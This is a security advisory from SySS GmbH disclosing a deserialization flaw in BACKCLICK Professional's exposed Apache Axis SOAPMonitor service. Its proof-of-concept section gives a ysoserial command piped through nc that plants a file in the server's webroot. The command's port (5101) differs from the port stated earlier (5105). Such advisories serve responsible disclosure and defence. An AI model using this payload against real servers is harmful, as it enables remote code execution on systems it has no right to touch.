-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-033 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-502: Deserialization of Untrusted Data Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: N/A Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to an unsafe active diagnostic third-party component performing unsafe deserialization, arbitrary code / system commands can be executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Apache Axis diagnostic SOAPMonitor service is active and listening on TCP port 5105. That service is documented[4] to be insecure and accepts untrusted Java serialized input over the network. Java serialization is known to be susceptible to deserialization attacks in which existing class behaviors are exploited using crafted object graphs to achieve malicious effects, e.g. execute arbitrary code on the target system. At least one known exploitable library is present in the application. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A payload targeting the commons-beanutils library can be generated with ysoserial[5] and submitted to the SOAPMonitor network listener: - ----- > java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar \ CommonsBeanutils1 touch /var/lib/tomcat9/webapps/bc/pwned.jsp | \ nc 5101 - ----- The created file can be observed on the server: - ---- > ls -la /var/lib/tomcat9/webapps/bc/pwned.jsp - -rw-r----- 1 tomcat tomcat 0 Mär 14 11:19 pwned.jsp - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-033 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-033.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Apache Axis SOAPMonitor Documentation https://axis.apache.org/axis2/java/core/docs/soapmonitor-module.html [5] ysoserial https://github.com/frohoff/ysoserial/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoS/AgArzcaDq8VARfXPlKpUb0VPdxEqVJKOjvx9NXyXF394lTd3yengn1U3vrU IAYq2/RylfIqWBAC4ItI/alFklAchzzqDd5fzjGdNisw4GCwlwvMC6c5nej6GdaL iHXYzTXlXvxDgjowkpZ3IHT5gyqXoAnYhv4vxcEN4ypLFV4F/eWiMUIrP81UjCZB jfkyJw+DhhWE/BQoZ8henCJXch+O/BUHAQJPzJJo43Yb0Vg/HOXtwc4C0vL7da/+ Ghi5Bz8QaySw6j3dCn3J2arUL8yQpJwtuVLpDkJ5m3vwmzISIN8fjfHPz30/tgPy UkMIiDp++fhVLdBlbNRZFqg+Y4Lhhw== =KszS -----END PGP SIGNATURE-----